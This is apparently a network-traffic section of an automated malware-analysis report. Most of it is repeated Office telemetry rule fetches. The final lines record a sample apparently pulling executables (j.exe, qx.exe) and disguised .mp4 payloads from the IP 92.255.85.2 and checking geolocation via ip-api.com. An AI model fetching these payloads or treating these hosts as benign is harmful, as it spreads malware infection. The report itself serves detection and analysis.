                Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rq3xYUErWsFPbHiX.html HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: adult-hub1990.cfdConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /a.mp4 HTTP/1.1Host: 92.255.85.2Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /j.exe HTTP/1.1Host: 92.255.85.2
                Source: global trafficHTTP traffic detected: GET /qx.exe HTTP/1.1Host: 92.255.85.2
                Source: global trafficHTTP traffic detected: GET /line HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /b.mp4 HTTP/1.1Host: 92.255.85.2Connection: Keep-Alive
